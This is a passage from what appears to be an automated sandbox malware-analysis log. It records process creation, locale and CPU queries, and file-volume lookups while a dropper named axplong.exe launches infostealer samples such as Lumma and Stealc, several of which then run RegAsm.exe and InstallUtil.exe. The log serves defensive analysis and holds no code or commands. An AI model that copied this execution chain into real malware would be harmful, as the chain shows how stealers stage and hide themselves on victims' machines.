                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe "C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe "C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe "C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe "C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe "C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe"
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe "C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeProcess created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeProcess created: C:\Users\user\AppData\Local\Temp\1000065001\stories.exe "C:\Users\user\AppData\Local\Temp\1000065001\stories.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4024 -ip 4024
                                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 904
                                  Source: penis.exe, 00000018.00000002.2884267791.000000000315A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetProgmanWindow
                                  Source: axplong.exeBinary or memory string: RtProgram Manager
                                  Source: file.exe, 00000000.00000002.2100263900.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2132726768.00000000008DE000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2137659091.00000000008DE000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: tProgram Manager
                                  Source: penis.exe, 00000018.00000002.2884267791.000000000315A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004077E0 cpuid 13_2_004077E0
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,13_2_0041E825
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,13_2_00414138
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,13_2_0041EA78
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_0041EBA1
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,13_2_0041E412
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,13_2_0041ECA7
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_0041ED76
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,13_2_0041465E
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,13_2_0041E60D
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,13_2_0041E6FF
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,13_2_0041E6B4
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,13_2_0041E79A
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000354001\c9a37ab27e.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000354001\c9a37ab27e.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000355001\2a8f2f9086.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000355001\2a8f2f9086.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000356001\neon.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000356001\neon.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformationJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeQueries volume information: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeQueries volume information: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000065001\stories.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000065001\stories.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\svchost015.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
